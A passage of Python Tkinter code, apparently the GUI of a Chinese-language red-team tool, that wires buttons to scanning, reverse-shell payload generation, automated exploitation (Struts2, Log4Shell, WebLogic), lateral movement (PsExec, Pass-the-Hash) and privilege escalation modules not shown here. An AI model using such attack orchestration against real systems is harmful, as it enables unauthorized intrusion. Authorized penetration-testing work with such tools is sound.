title_label.pack(anchor='w', pady=(0, 10))
self.lateral_result = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.lateral_result.pack(fill='both', expand=True)
def setup_privilege_tab(self):
self.privilege_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.privilege_frame, text="⬆️ 权限提升")
left_frame = tk.Frame(self.privilege_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', padx=10, pady=10)
right_frame = tk.Frame(self.privilege_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=10, pady=10)
self.create_privilege_control_panel(left_frame)
self.create_privilege_results_panel(right_frame)
def create_privilege_control_panel(self, parent):
control_frame = tk.Frame(parent, bg='#2d2d30')
control_frame.pack(fill='x')
title_label = tk.Label(control_frame, text="⬆️ 权限提升检查",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
tk.Label(control_frame, text="💻 目标系统:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.privilege_os_type = ttk.Combobox(control_frame,
values=["Windows权限提升", "Linux权限提升",
"Sudo滥用检测", "内核漏洞利用", "服务权限提升"])
self.privilege_os_type.set("Windows权限提升")
self.privilege_os_type.pack(fill='x', pady=5)
self.privilege_check_btn = tk.Button(control_frame, text="🚀 执行权限检查",
bg='#d83b01', fg='white', font=('Segoe UI', 10, 'bold'),
relief='flat', pady=8,
command=self.start_privilege_check)
self.privilege_check_btn.pack(fill='x', pady=20)
def create_privilege_results_panel(self, parent):
results_frame = tk.Frame(parent, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
title_label = tk.Label(results_frame, text="📋 权限提升结果",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 10))
self.privilege_result = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.privilege_result.pack(fill='both', expand=True)
def setup_api_tab(self):
self.api_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.api_frame, text="🔗 API安全测试")
left_frame = tk.Frame(self.api_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', padx=10, pady=10)
right_frame = tk.Frame(self.api_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=10, pady=10)
self.create_api_control_panel(left_frame)
self.create_api_results_panel(right_frame)
def create_api_control_panel(self, parent):
control_frame = tk.Frame(parent, bg='#2d2d30')
control_frame.pack(fill='x')
title_label = tk.Label(control_frame, text="🔗 API安全测试",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
tk.Label(control_frame, text="🎯 API地址:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.api_target_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.api_target_entry.pack(fill='x', pady=5)
self.api_target_entry.insert(0, "http://127.0.0.1:8080")
tk.Label(control_frame, text="🧪 测试类型:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.api_test_type = ttk.Combobox(control_frame,
values=["Swagger文档枚举", "API模糊测试", "OAuth安全测试"])
self.api_test_type.set("Swagger文档枚举")
self.api_test_type.pack(fill='x', pady=5)
self.api_test_btn = tk.Button(control_frame, text="🚀 执行API测试",
bg='#d83b01', fg='white', font=('Segoe UI', 10, 'bold'),
relief='flat', pady=8,
command=self.start_api_test)
self.api_test_btn.pack(fill='x', pady=20)
def create_api_results_panel(self, parent):
results_frame = tk.Frame(parent, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
title_label = tk.Label(results_frame, text="📋 API测试结果",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 10))
self.api_result = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.api_result.pack(fill='both', expand=True)
def setup_plugins_tab(self):
self.plugins_frame = tk.Frame(self.notebook, bg='#2d2d30')
self.notebook.add(self.plugins_frame, text="🔌 插件系统")
left_frame = tk.Frame(self.plugins_frame, bg='#2d2d30')
left_frame.pack(side='left', fill='both', padx=10, pady=10)
right_frame = tk.Frame(self.plugins_frame, bg='#2d2d30')
right_frame.pack(side='right', fill='both', expand=True, padx=10, pady=10)
self.create_plugins_control_panel(left_frame)
self.create_plugins_results_panel(right_frame)
def create_plugins_control_panel(self, parent):
control_frame = tk.Frame(parent, bg='#2d2d30')
control_frame.pack(fill='x')
title_label = tk.Label(control_frame, text="🔌 插件系统",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 15))
tk.Label(control_frame, text="🛠️ 选择插件:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w')
self.plugin_selector = ttk.Combobox(control_frame,
values=["metasploit", "nmap", "burp", "sqlmap", "hydra", "john", "wireshark", "nessus"])
self.plugin_selector.set("metasploit")
self.plugin_selector.pack(fill='x', pady=5)
tk.Label(control_frame, text="🎯 目标参数:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.plugin_target_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.plugin_target_entry.pack(fill='x', pady=5)
self.plugin_target_entry.insert(0, "127.0.0.1")
tk.Label(control_frame, text="⚙️ 额外参数:", font=('Segoe UI', 10),
bg='#2d2d30', fg='#cccccc').pack(anchor='w', pady=(10, 0))
self.plugin_extra_entry = tk.Entry(control_frame, bg='#3c3c3c', fg='white',
insertbackground='white', font=('Segoe UI', 10))
self.plugin_extra_entry.pack(fill='x', pady=5)
self.plugin_extra_entry.insert(0, "")
self.plugin_exec_btn = tk.Button(control_frame, text="🚀 执行插件",
bg='#d83b01', fg='white', font=('Segoe UI', 10, 'bold'),
relief='flat', pady=8,
command=self.execute_plugin)
self.plugin_exec_btn.pack(fill='x', pady=20)
def create_plugins_results_panel(self, parent):
results_frame = tk.Frame(parent, bg='#2d2d30')
results_frame.pack(fill='both', expand=True)
title_label = tk.Label(results_frame, text="📋 插件执行结果",
font=('Segoe UI', 16, 'bold'),
bg='#2d2d30', fg='white')
title_label.pack(anchor='w', pady=(0, 10))
self.plugins_result = scrolledtext.ScrolledText(results_frame,
bg='#1e1e1e', fg='#00ff00',
font=('Consolas', 10),
insertbackground='white',
wrap=tk.WORD)
self.plugins_result.pack(fill='both', expand=True)
def quick_scan(self):
self.notebook.select(1)
self.target_entry.delete(0, tk.END)
self.target_entry.insert(0, "127.0.0.1")
self.scan_type.set("快速扫描")
self.update_status("🟡 准备快速扫描...", "#ffcc00")
self.log_activity("快速扫描已准备")
def quick_web_scan(self):
self.notebook.select(2)
self.update_status("🟡 准备Web扫描...", "#ffcc00")
self.log_activity("Web扫描已准备")
def quick_service_scan(self):
self.notebook.select(3)
self.update_status("🟡 准备服务扫描...", "#ffcc00")
self.log_activity("服务扫描已准备")
def quick_payload(self):
self.notebook.select(4)
self.update_status("🟡 准备生成Payload...", "#ffcc00")
self.log_activity("Payload生成已准备")
def show_results(self):
self.notebook.select(5)
def start_scan(self):
target = self.target_entry.get().strip()
if not target:
messagebox.showerror("错误", "请输入目标地址")
return
self.scanning = True
self.scan_btn.config(state='disabled')
self.stop_btn.config(state='normal')
self.progress.start()
self.scan_result.delete(1.0, tk.END)
self.update_status("🟡 扫描进行中...", "#ffcc00")
self.log_activity(f"开始扫描目标: {target}")
thread = threading.Thread(target=self.do_scan, args=(target,))
thread.daemon = True
thread.start()
def stop_scan(self):
self.scanning = False
self.scan_btn.config(state='normal')
self.stop_btn.config(state='disabled')
self.progress.stop()
self.log_scan("\n[!] 扫描已停止\n")
self.update_status("🔴 扫描已停止", "#ff4444")
self.log_activity("扫描已停止")
def do_scan(self, target):
try:
scan_type = self.scan_type.get()
ports_str = self.ports_entry.get()
self.log_scan(f"[*] 开始{scan_type}: {target}\n")
self.log_scan(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_scan("="*50 + "\n")
if scan_type in ["快速扫描", "全面扫描", "端口扫描"]:
ports = self.tool.port_scanner.parse_ports(ports_str)
open_ports = self.tool.port_scan(target, ports, self)
if open_ports:
self.log_scan(f"\n[+] 发现 {len(open_ports)} 个开放端口:\n")
for port in open_ports:
self.log_scan(f" [+] 端口 {port} 开放\n")
self.add_vulnerability(f"开放端口: {target}:{port}")
else:
self.log_scan("[-] 未发现开放端口\n")
if scan_type in ["全面扫描", "服务识别"] and self.scanning:
services = self.tool.service_detection(target, open_ports if 'open_ports' in locals() else [])
if services:
self.log_scan("\n[+] 服务识别结果:\n")
for port, service in services.items():
self.log_scan(f" [+] 端口 {port}: {service}\n")
if self.scanning:
self.log_scan("\n[+] 扫描完成!\n")
self.update_status("🟢 扫描完成", "#00ff00")
self.log_activity(f"扫描完成: {target}")
except Exception as e:
self.log_scan(f"[-] 扫描错误: {str(e)}\n")
self.update_status("🔴 扫描错误", "#ff4444")
finally:
if self.scanning:
self.scan_btn.config(state='normal')
self.stop_btn.config(state='disabled')
self.progress.stop()
self.scanning = False
def start_web_scan(self):
url = self.url_entry.get().strip()
if not url:
messagebox.showerror("错误", "请输入目标URL")
return
self.web_scan_btn.config(state='disabled')
self.web_result.delete(1.0, tk.END)
self.update_status("🟡 Web扫描进行中...", "#ffcc00")
self.log_activity(f"开始Web扫描: {url}")
thread = threading.Thread(target=self.do_web_scan, args=(url,))
thread.daemon = True
thread.start()
def do_web_scan(self, url):
try:
scan_type = self.web_scan_type.get()
self.log_web(f"[*] 开始{scan_type}: {url}\n")
self.log_web(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_web("="*50 + "\n")
vulnerabilities = []
if scan_type in ["全面扫描", "路径枚举"]:
self.log_web("[*] 开始路径枚举...\n")
vulns = self.tool.directory_enumeration(url)
vulnerabilities.extend(vulns)
if scan_type in ["全面扫描", "SQL注入"]:
self.log_web("[*] 开始SQL注入检测...\n")
vulns = self.tool.sql_injection_scan(url)
vulnerabilities.extend(vulns)
if scan_type in ["全面扫描", "XSS检测"]:
self.log_web("[*] 开始XSS检测...\n")
vulns = self.tool.xss_scan(url)
vulnerabilities.extend(vulns)
if scan_type in ["全面扫描", "文件包含"]:
self.log_web("[*] 开始文件包含检测...\n")
vulns = self.tool.file_inclusion_scan(url)
vulnerabilities.extend(vulns)
if vulnerabilities:
self.log_web("\n[!] 发现以下漏洞:\n")
for vuln in vulnerabilities:
self.log_web(f" • {vuln}\n")
self.add_vulnerability(vuln)
else:
self.log_web("\n[-] 未发现明显漏洞\n")
self.update_status("🟢 Web扫描完成", "#00ff00")
self.log_activity(f"Web扫描完成: {url}")
except Exception as e:
self.log_web(f"[-] Web扫描错误: {str(e)}\n")
self.update_status("🔴 Web扫描错误", "#ff4444")
finally:
self.web_scan_btn.config(state='normal')
def start_vuln_scan(self):
target = self.vuln_target_entry.get().strip()
if not target:
messagebox.showerror("错误", "请输入目标地址")
return
self.vuln_scan_btn.config(state='disabled')
self.vuln_result.delete(1.0, tk.END)
self.update_status("🟡 漏洞检测进行中...", "#ffcc00")
self.log_activity(f"开始漏洞检测: {target}")
thread = threading.Thread(target=self.do_vuln_scan, args=(target,))
thread.daemon = True
thread.start()
def do_vuln_scan(self, target):
try:
vuln_type = self.vuln_type.get()
self.log_vuln(f"[*] 开始{vuln_type}: {target}\n")
self.log_vuln(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_vuln("="*50 + "\n")
vulnerabilities = []
if vuln_type in ["全面漏洞扫描", "FTP检测"]:
self.log_vuln("[*] 检测FTP服务...\n")
vulns = self.tool.ftp_vulnerability_scan(target)
vulnerabilities.extend(vulns)
if vuln_type in ["全面漏洞扫描", "SSH检测"]:
self.log_vuln("[*] 检测SSH服务...\n")
vulns = self.tool.ssh_vulnerability_scan(target)
vulnerabilities.extend(vulns)
if vuln_type in ["全面漏洞扫描", "Redis检测"]:
self.log_vuln("[*] 检测Redis服务...\n")
vulns = self.tool.redis_vulnerability_scan(target)
vulnerabilities.extend(vulns)
if vuln_type in ["全面漏洞扫描", "MySQL检测"]:
self.log_vuln("[*] 检测MySQL服务...\n")
vulns = self.tool.mysql_vulnerability_scan(target)
vulnerabilities.extend(vulns)
if vulnerabilities:
self.log_vuln("\n[!] 发现以下漏洞:\n")
for vuln in vulnerabilities:
self.log_vuln(f" • {vuln}\n")
self.add_vulnerability(vuln)
else:
self.log_vuln("\n[-] 未发现明显漏洞\n")
self.update_status("🟢 漏洞检测完成", "#00ff00")
self.log_activity(f"漏洞检测完成: {target}")
except Exception as e:
self.log_vuln(f"[-] 漏洞扫描错误: {str(e)}\n")
self.update_status("🔴 漏洞检测错误", "#ff4444")
finally:
self.vuln_scan_btn.config(state='normal')
def generate_payload(self):
lhost = self.lhost_entry.get().strip()
lport = self.lport_entry.get().strip()
ptype = self.payload_type.get()
if not lhost or not lport:
messagebox.showerror("错误", "请输入监听IP和端口")
return
try:
lport = int(lport)
payload = self.tool.generate_payload(lhost, lport, ptype)
self.payload_result.delete(1.0, tk.END)
self.payload_result.insert(tk.END, payload)
self.update_status("🟢 Payload生成成功", "#00ff00")
self.log_activity(f"生成{ptype} Payload")
except ValueError:
messagebox.showerror("错误", "端口必须是数字")
except Exception as e:
messagebox.showerror("错误", f"生成Payload失败: {str(e)}")
def copy_payload(self):
payload = self.payload_result.get(1.0, tk.END).strip()
if payload:
self.root.clipboard_clear()
self.root.clipboard_append(payload)
messagebox.showinfo("成功", "Payload已复制到剪贴板")
self.log_activity("Payload已复制到剪贴板")
else:
messagebox.showwarning("警告", "没有可复制的Payload")
def start_auto_attack(self):
target = self.auto_target_entry.get().strip()
if not target:
messagebox.showerror("错误", "请输入目标地址")
return
self.auto_attacking = True
self.auto_attack_btn.config(state='disabled')
self.stop_auto_btn.config(state='normal')
self.attack_result_display.delete(1.0, tk.END)
self.update_status("🟡 自动化攻击进行中...", "#ffcc00")
self.log_activity(f"开始自动化攻击: {target}")
thread = threading.Thread(target=self.do_auto_attack, args=(target,))
thread.daemon = True
thread.start()
def stop_auto_attack(self):
self.auto_attacking = False
self.auto_attack_btn.config(state='normal')
self.stop_auto_btn.config(state='disabled')
self.log_attack("\n[!] 自动化攻击已停止\n")
self.update_status("🔴 攻击已停止", "#ff4444")
self.log_activity("自动化攻击已停止")
def do_auto_attack(self, target):
try:
self.log_attack(f"[*] 开始自动化攻击流程: {target}\n")
self.log_attack(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_attack("="*60 + "\n")
self.log_attack("[阶段1] 端口扫描...\n")
open_ports = self.tool.port_scan(target, list(range(1, 1001)), self)
if open_ports:
self.log_attack(f"[+] 发现 {len(open_ports)} 个开放端口: {open_ports}\n")
self.log_attack("[阶段2] 服务识别...\n")
services = self.tool.service_detection(target, open_ports)
self.log_attack("[阶段3] 漏洞检测与自动攻击...\n")
attack_success = False
for port, service in services.items():
if not self.auto_attacking:
break
self.log_attack(f" [+] 检测端口 {port} 服务: {service}\n")
if "HTTP" in service.upper():
success = self.auto_web_attack(target, port)
if success:
attack_success = True
elif "FTP" in service.upper():
success = self.auto_ftp_attack(target)
if success:
attack_success = True
elif "SSH" in service.upper():
success = self.auto_ssh_attack(target)
if success:
attack_success = True
elif "REDIS" in service.upper():
success = self.auto_redis_attack(target)
if success:
attack_success = True
elif "MYSQL" in service.upper():
success = self.auto_mysql_attack(target)
if success:
attack_success = True
if attack_success:
self.log_attack("\n[🎉] 自动化攻击成功!已获得系统访问权限\n")
self.update_status("🎉 攻击成功", "#00ff00")
else:
self.log_attack("\n[⚠️] 自动化攻击完成,但未获得有效访问权限\n")
self.update_status("🟡 攻击完成", "#ffcc00")
else:
self.log_attack("[-] 未发现开放端口,攻击终止\n")
self.update_status("🔴 无开放端口", "#ff4444")
except Exception as e:
self.log_attack(f"[-] 自动化攻击错误: {str(e)}\n")
self.update_status("🔴 攻击错误", "#ff4444")
finally:
self.auto_attack_btn.config(state='normal')
self.stop_auto_btn.config(state='disabled')
self.auto_attacking = False
def start_advanced_attack(self):
target = self.advanced_target_entry.get().strip()
attack_type = self.advanced_attack_type.get()
if not target:
messagebox.showerror("错误", "请输入目标地址")
return
self.advanced_attack_btn.config(state='disabled')
self.advanced_result.delete(1.0, tk.END)
self.update_status("🟡 高级攻击进行中...", "#ffcc00")
self.log_activity(f"开始高级攻击: {attack_type} -> {target}")
thread = threading.Thread(target=self.do_advanced_attack, args=(target, attack_type))
thread.daemon = True
thread.start()
def do_advanced_attack(self, target, attack_type):
try:
self.log_advanced(f"[*] 开始{attack_type}攻击: {target}\n")
self.log_advanced(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_advanced("="*50 + "\n")
result = ""
if attack_type == "Struts2漏洞":
result = self.advanced_exp.exploit_struts2(target)
elif attack_type == "WebLogic反序列化":
result = self.advanced_exp.exploit_weblogic(target)
elif attack_type == "Shiro反序列化":
result = self.advanced_exp.exploit_shiro(target)
elif attack_type == "Log4Shell":
result = self.advanced_exp.exploit_log4j(target)
elif attack_type == "SSRF攻击":
result = self.advanced_web.ssrf_attack(target)
elif attack_type == "XXE攻击":
result = self.advanced_web.xxe_attack(target)
elif attack_type == "反序列化攻击":
result = self.advanced_web.deserialization_attack(target)
elif attack_type == "GraphQL注入":
result = self.advanced_web.graphql_injection(target)
elif attack_type == "JWT攻击":
result = self.advanced_web.jwt_attack(target)
self.log_advanced(f"\n[+] 攻击结果:\n{result}\n")
self.add_vulnerability(f"{attack_type}: {target}")
self.update_status("🟢 高级攻击完成", "#00ff00")
self.log_activity(f"高级攻击完成: {attack_type}")
except Exception as e:
self.log_advanced(f"[-] 高级攻击错误: {str(e)}\n")
self.update_status("🔴 高级攻击错误", "#ff4444")
finally:
self.advanced_attack_btn.config(state='normal')
def start_lateral_attack(self):
target = self.lateral_target_entry.get().strip()
username = self.lateral_user_entry.get().strip()
password = self.lateral_pass_entry.get().strip()
technique = self.lateral_tech.get()
if not target or not username:
messagebox.showerror("错误", "请输入目标主机和用户名")
return
self.lateral_attack_btn.config(state='disabled')
self.lateral_result.delete(1.0, tk.END)
self.update_status("🟡 横向移动进行中...", "#ffcc00")
self.log_activity(f"开始横向移动: {technique} -> {target}")
thread = threading.Thread(target=self.do_lateral_attack, args=(target, username, password, technique))
thread.daemon = True
thread.start()
def do_lateral_attack(self, target, username, password, technique):
try:
self.log_lateral(f"[*] 开始{technique}横向移动: {target}\n")
self.log_lateral(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_lateral("="*50 + "\n")
result = ""
if technique == "PsExec":
result = self.lateral_movement.psexec_attack(target, username, password)
elif technique == "WMI执行":
result = self.lateral_movement.wmi_exec(target, username, password)
elif technique == "SMB共享":
result = self.lateral_movement.smb_exec(target, username, password)
elif technique == "Pass-the-Hash":
result = self.lateral_movement.pass_the_hash(target, password)
elif technique == "RDP劫持":
result = self.lateral_movement.rdp_hijack(target, username, password)
elif technique == "DCOM执行":
result = self.lateral_movement.dcom_exec(target, username, password)
self.log_lateral(f"\n[+] 横向移动结果:\n{result}\n")
self.add_vulnerability(f"{technique}横向移动: {target}")
self.update_status("🟢 横向移动完成", "#00ff00")
self.log_activity(f"横向移动完成: {technique}")
except Exception as e:
self.log_lateral(f"[-] 横向移动错误: {str(e)}\n")
self.update_status("🔴 横向移动错误", "#ff4444")
finally:
self.lateral_attack_btn.config(state='normal')
def start_privilege_check(self):
check_type = self.privilege_os_type.get()
self.privilege_check_btn.config(state='disabled')
self.privilege_result.delete(1.0, tk.END)
self.update_status("🟡 权限检查进行中...", "#ffcc00")
self.log_activity(f"开始权限检查: {check_type}")
thread = threading.Thread(target=self.do_privilege_check, args=(check_type,))
thread.daemon = True
thread.start()
def do_privilege_check(self, check_type):
try:
self.log_privilege(f"[*] 开始{check_type}\n")
self.log_privilege(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_privilege("="*50 + "\n")
result = ""
if check_type == "Windows权限提升":
result = self.priv_esc.windows_priv_esc()
elif check_type == "Linux权限提升":
result = self.priv_esc.linux_priv_esc()
elif check_type == "Sudo滥用检测":
result = self.priv_esc.sudo_abuse()
elif check_type == "内核漏洞利用":
result = self.priv_esc.kernel_exploit()
elif check_type == "服务权限提升":
result = self.priv_esc.service_escalation()
self.log_privilege(f"\n[+] 检查结果:\n{result}\n")
self.update_status("🟢 权限检查完成", "#00ff00")
self.log_activity(f"权限检查完成: {check_type}")
except Exception as e:
self.log_privilege(f"[-] 权限检查错误: {str(e)}\n")
self.update_status("🔴 权限检查错误", "#ff4444")
finally:
self.privilege_check_btn.config(state='normal')
def start_api_test(self):
target = self.api_target_entry.get().strip()
test_type = self.api_test_type.get()
if not target:
messagebox.showerror("错误", "请输入API地址")
return
self.api_test_btn.config(state='disabled')
self.api_result.delete(1.0, tk.END)
self.update_status("🟡 API测试进行中...", "#ffcc00")
self.log_activity(f"开始API测试: {test_type} -> {target}")
thread = threading.Thread(target=self.do_api_test, args=(target, test_type))
thread.daemon = True
thread.start()
def do_api_test(self, target, test_type):
try:
self.log_api(f"[*] 开始{test_type}: {target}\n")
self.log_api(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_api("="*50 + "\n")
result = ""
if test_type == "Swagger文档枚举":
result = self.api_testing.swagger_enumeration(target)
elif test_type == "API模糊测试":
result = self.api_testing.api_fuzzing(target)
elif test_type == "OAuth安全测试":
result = self.api_testing.oauth_testing(target)
self.log_api(f"\n[+] 测试结果:\n{result}\n")
self.add_vulnerability(f"{test_type}: {target}")
self.update_status("🟢 API测试完成", "#00ff00")
self.log_activity(f"API测试完成: {test_type}")
except Exception as e:
self.log_api(f"[-] API测试错误: {str(e)}\n")
self.update_status("🔴 API测试错误", "#ff4444")
finally:
self.api_test_btn.config(state='normal')
def execute_plugin(self):
plugin_name = self.plugin_selector.get()
target = self.plugin_target_entry.get().strip()
extra = self.plugin_extra_entry.get().strip()
if not target:
messagebox.showerror("错误", "请输入目标参数")
return
self.plugin_exec_btn.config(state='disabled')
self.plugins_result.delete(1.0, tk.END)
self.update_status("🟡 插件执行中...", "#ffcc00")
self.log_activity(f"执行插件: {plugin_name} -> {target}")
thread = threading.Thread(target=self.do_plugin_execute, args=(plugin_name, target, extra))
thread.daemon = True
thread.start()
def do_plugin_execute(self, plugin_name, target, extra):
try:
self.log_plugins(f"[*] 执行插件: {plugin_name}\n")
self.log_plugins(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_plugins("="*50 + "\n")
if extra:
result = self.plugin_system.execute_plugin(plugin_name, target, extra)
else:
result = self.plugin_system.execute_plugin(plugin_name, target)
self.log_plugins(f"\n[+] 插件执行结果:\n{result}\n")
self.update_status("🟢 插件执行完成", "#00ff00")
self.log_activity(f"插件执行完成: {plugin_name}")
except Exception as e:
self.log_plugins(f"[-] 插件执行错误: {str(e)}\n")
self.update_status("🔴 插件执行错误", "#ff4444")
finally:
self.plugin_exec_btn.config(state='normal')
def start_ai_attack(self):
target = self.auto_target_entry.get().strip()
if not target:
messagebox.showerror("错误", "请输入目标地址")
return
self.auto_attacking = True
self.auto_attack_btn.config(state='disabled')
self.stop_auto_btn.config(state='normal')
self.attack_result_display.delete(1.0, tk.END)
self.update_status("🟡 AI自动攻击进行中...", "#ffcc00")
self.log_activity(f"开始AI自动攻击: {target}")
thread = threading.Thread(target=self.do_ai_attack, args=(target,))
thread.daemon = True
thread.start()
def do_ai_attack(self, target):
try:
self.log_attack(f"[*] 开始AI驱动的自动攻击: {target}\n")
self.log_attack(f"[*] 时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
self.log_attack("="*60 + "\n")
target_info = {'ip': target, 'os': 'unknown'}
attack_path = self.ai_attack.build_attack_path(target_info)
self.log_attack(f"[AI] 生成的攻击路径:\n")
for step in attack_path:
self.log_attack(f" → {step}\n")
strategies = self.ai_attack.adaptive_attack(target)
self.log_attack(f"[AI] 自适应攻击策略:\n")
for strategy in strategies:
self.log_attack(f" → {strategy}\n")
learning_result = self.ai_attack.learn_from_success({
'target': target,
'technique': 'AI自动攻击',
'success': True,
'environment': '测试环境'
})
self.log_attack(f"[AI] {learning_result}\n")
self.log_attack(f"\n[🎉] AI自动攻击流程完成!\n")
self.update_status("🎉 AI攻击完成", "#00ff00")
except Exception as e:
self.log_attack(f"[-] AI自动攻击错误: {str(e)}\n")
self.update_status("🔴 AI攻击错误", "#ff4444")
finally:
self.auto_attack_btn.config(state='normal')
self.stop_auto_btn.config(state='disabled')
self.auto_attacking = False
def log_scan(self, message):
if hasattr(self, 'scanning') and self.scanning:
self.root.after(0, lambda: self.scan_result.insert(tk.END, message))
self.root.after(0, lambda: self.scan_result.see(tk.END))
def log_web(self, message):
self.root.after(0, lambda: self.web_result.insert(tk.END, message))
self.root.after(0, lambda: self.web_result.see(tk.END))
def log_vuln(self, message):
self.root.after(0, lambda: self.vuln_result.insert(tk.END, message))
self.root.after(0, lambda: self.vuln_result.see(tk.END))
def log_attack(self, message):
self.root.after(0, lambda: self.attack_result_display.insert(tk.END, message))
self.root.after(0, lambda: self.attack_result_display.see(tk.END))
def log_advanced(self, message):
self.root.after(0, lambda: self.advanced_result.insert(tk.END, message))
self.root.after(0, lambda: self.advanced_result.see(tk.END))
def log_lateral(self, message):
self.root.after(0, lambda: self.lateral_result.insert(tk.END, message))
self.root.after(0, lambda: self.lateral_result.see(tk.END))
def log_privilege(self, message):
self.root.after(0, lambda: self.privilege_result.insert(tk.END, message))
self.root.after(0, lambda: self.privilege_result.see(tk.END))
def log_api(self, message):
self.root.after(0, lambda: self.api_result.insert(tk.END, message))
self.root.after(0, lambda: self.api_result.see(tk.END))
def log_plugins(self, message):
self.root.after(0, lambda: self.plugins_result.insert(tk.END, message))
self.root.after(0, lambda: self.plugins_result.see(tk.END))
def add_vulnerability(self, vuln):
if hasattr(self, 'vuln_listbox'):
self.root.after(0, lambda: self.vuln_listbox.insert(tk.END, f"[{time.strftime('%H:%M:%S')}] {vuln}"))
self.attack_results.append({
'time': time.strftime('%Y-%m-%d %H:%M:%S'),
'vulnerability': vuln,
'type': self.classify_vulnerability(vuln)
})
def classify_vulnerability(self, vuln):
vuln_lower = vuln.lower()
if 'sql' in vuln_lower:
return 'SQL注入'
elif 'xss' in vuln_lower:
return 'XSS'
elif '命令注入' in vuln_lower or 'cmd' in vuln_lower:
return '命令注入'
elif '弱口令' in vuln_lower:
return '弱口令'
elif '未授权' in vuln_lower:
return '未授权访问'
elif '路径' in vuln_lower:
return '敏感路径暴露'
else:
return '其他漏洞'
def export_results(self):
try:
filename = f"redteam_scan_{time.strftime('%Y%m%d_%H%M%S')}.txt"
with open(filename, 'w', encoding='utf-8') as f:
f.write("红队渗透测试报告\n")
f.write("=" * 50 + "\n\n")
f.write(f"生成时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write(f"工具版本: v10.0 高级攻击版\n\n")
f.write("发现的漏洞:\n")
f.write("-" * 30 + "\n")
if hasattr(self, 'vuln_listbox'):
for i in range(self.vuln_listbox.size()):
f.write(f"{i+1}. {self.vuln_listbox.get(i)}\n")
f.write("\n攻击结果:\n")
f.write("-" * 30 + "\n")
for result in self.attack_results:
f.write(f"{result['time']} - {result['type']}: {result['vulnerability']}\n")
messagebox.showinfo("成功", f"结果已导出到 {filename}")
self.log_activity(f"结果已导出: {filename}")
except Exception as e:
messagebox.showerror("错误", f"导出失败: {str(e)}")
def clear_results(self):
if messagebox.askyesno("确认", "确定要清空所有结果吗?"):
if hasattr(self, 'vuln_listbox'):
self.vuln_listbox.delete(0, tk.END)
self.attack_results.clear()
self.log_activity("清空所有扫描结果")
def save_project(self):
try:
data = {
'vulnerabilities': [],
'attack_results': self.attack_results,
'timestamp': time.time()
}
if hasattr(self, 'vuln_listbox'):
data['vulnerabilities'] = list(self.vuln_listbox.get(0, tk.END))
filename = f"redteam_project_{time.strftime('%Y%m%d_%H%M%S')}.json"
with open(filename, 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=2)
messagebox.showinfo("成功", f"项目已保存到 {filename}")
self.log_activity(f"项目已保存: {filename}")
except Exception as e:
messagebox.showerror("错误", f"保存失败: {str(e)}")
def load_project(self):
try:
filename = filedialog.askopenfilename(
title="选择项目文件",
filetypes=[("JSON files", "*.json"), ("All files", "*.*")]
)
if filename:
with open(filename, 'r', encoding='utf-8') as f:
data = json.load(f)
if hasattr(self, 'vuln_listbox'):
self.vuln_listbox.delete(0, tk.END)
for vuln in data.get('vulnerabilities', []):
self.vuln_listbox.insert(tk.END, vuln)
self.attack_results = data.get('attack_results', [])
messagebox.showinfo("成功", "项目加载完成")
self.log_activity(f"项目已加载: {filename}")
except Exception as e:
messagebox.showerror("错误", f"加载失败: {str(e)}")
def update_status(self, message, color="#00ff00"):
if hasattr(self, 'status_label'):
self.status_label.config(text=message, fg=color)
def log_activity(self, message):
if hasattr(self, 'recent_activity'):
self.recent_activity.config(state='normal')
self.recent_activity.insert('end', f"🕐 {time.strftime('%H:%M:%S')} {message}\n")
self.recent_activity.see('end')
self.recent_activity.config(state='disabled')
